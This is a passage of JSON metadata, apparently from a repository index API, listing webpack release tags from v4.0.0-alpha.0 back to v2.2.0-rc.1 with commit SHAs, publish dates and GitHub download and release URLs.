e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-r